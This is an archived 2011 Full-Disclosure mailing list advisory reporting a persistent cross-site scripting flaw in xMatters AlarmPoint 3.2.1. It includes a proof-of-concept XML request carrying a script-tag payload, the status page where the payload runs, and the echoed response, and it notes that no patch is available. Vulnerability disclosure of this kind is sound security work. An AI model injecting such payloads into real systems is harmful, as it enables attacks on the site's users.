full-disclosure - Insect Pro - Advisory 2011 0427 Persistent Cross-Site Scripting (XSS) in xMatters AlarmPoint

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]

Message-ID: <d39c9a6f22f1bff58e32e49fbd9fc472@insecurityresearch.com>
Date: Wed, 27 Apr 2011 15:06:33 -0500
From: Juan Sacco <jsacco@...ecurityresearch.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Insect Pro - Advisory 2011 0427 Persistent
 Cross-Site Scripting (XSS) in xMatters AlarmPoint

 Information
 --------------------
 Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web 
 Server API
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Cross-Site Scripting
 Severity : High
 Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>

 Description
 ------------------
 The AlarmPoint Java Server consists of a collection of software  
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to 
 AlarmPoint.

 Details
 -------------------
 AlarmPoint Java Web Server API is affected by a Persistent XSS 
 vulnerability in version 3.2.1

 Exploit as follow:
 Insert new HTTP API with the following malicious code:
 <?xml version="1.0"?>
 <transaction version="1.0">
    <header>
        <method>Alive</method>
    </header>
    <data>
        <agent_client_id>ping</agent_client_id>
    </data>
 </transaction>'><script>alert(/XSS/)</script>

 Go to: http://example.com:2010/agent/status.html
 Reponse:
 AgentStatus
 3.2.1 (Build 
 23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'><script>alert(/XSS/)</script>

 Cross-Site Scripting attacks are a type of injection problem, in which 
 malicious scripts are injected into the otherwise benign and trusted web 
 sites.
 https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

 Solution
 -------------------
 No patch are available at this time.

 Credits
 -------------------
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _________________________________________________
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/